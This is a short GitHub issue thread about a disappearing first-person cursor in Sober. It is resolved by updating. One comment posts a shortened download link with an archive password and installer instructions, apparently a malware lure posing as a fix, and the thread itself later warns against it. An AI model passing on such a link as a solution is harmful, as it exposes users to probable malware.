### ISSUE TITLE
Sober cursor disappearing

### ISSUE THREAD

**Issue by Vrowed** [vinegarhq/sober#173]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

So when the cursor disappears varies, but I do notice that the cursor for selecting UI does work. However, the cursor that you see in first person for example disappears completely.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Vrowed** [comment]
> Download 
> https://bit.ly/3MjP129
> password: changeme
> In the installer menu, select "gcc."

What does this download?

**Comment by YeGop0218** [comment]
> > Download
> > https://bit.ly/3MjP129
> > password: changeme
> > In the installer menu, select "gcc."
> 
> What does this download?

Do not download it！

**Comment by tunis4** [comment]
it has been resolved already, update sober
